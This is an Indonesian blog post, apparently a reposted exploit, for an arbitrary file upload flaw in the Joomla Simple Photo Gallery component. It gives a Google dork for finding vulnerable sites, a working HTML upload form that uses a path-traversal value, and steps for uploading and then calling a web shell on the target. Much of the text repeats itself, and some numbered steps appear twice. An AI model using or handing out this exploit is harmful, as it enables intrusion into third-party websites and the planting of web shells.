Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability
Assalamualaikum wr wb
________________________________
Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability
Celah Pada Simple Photo Gallery Di Cms Joomla Bisa Di Eksploitasi Dengan Uploader
Author: CrashBandicot
================================
Google Dork: inurl:com_simplephotogallery
(Kembangin Dorknya)
================================
Vulnerable File : uploadFile.php
Path : exploit: /administrator/components/com_simplephotogallery/lib/uploadFile.php
================================
Html Exploit:
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
================================
Proof Of Concept:
1.Dorking Dan Pilih Web Yang Vuln
________________________________
Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability
Celah Pada Simple Photo Gallery Di Cms Joomla Bisa Di Eksploitasi Dengan Uploader
Author: CrashBandicot
================================
Google Dork: inurl:com_simplephotogallery
(Kembangin Dorknya)
================================
Vulnerable File : uploadFile.php
Path : exploit: /administrator/components/com_simplephotogallery/lib/uploadFile.php
================================
Html Exploit:
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
<input type="file" name="uploadfile"><br>
<input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
================================
Proof Of Concept:
1.Dorking Dan Pilih Web Yang Vuln
Vuln: /administrator/components/com_simplephotogallery/lib/uploadFile.php
Tambahkan exploitnya:v..
2.Masukan Target Ke Html Exploit Yang Kalian Edit lalu Save Ekstensi Html
3.Buka Html Exploiternya Di Localhost
2.Masukan Target Ke Html Exploit Yang Kalian Edit lalu Save Ekstensi Html
3.Buka Html Exploiternya Di Localhost
4.Up your Shell
Panggil Shellmu Dengan Path
http://localhost/shell_[ransom].php
Sekian
Wassalamualaikum Wr wb
Wassalamualaikum Wr wb
Belum ada Komentar untuk "Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability"
Posting Komentar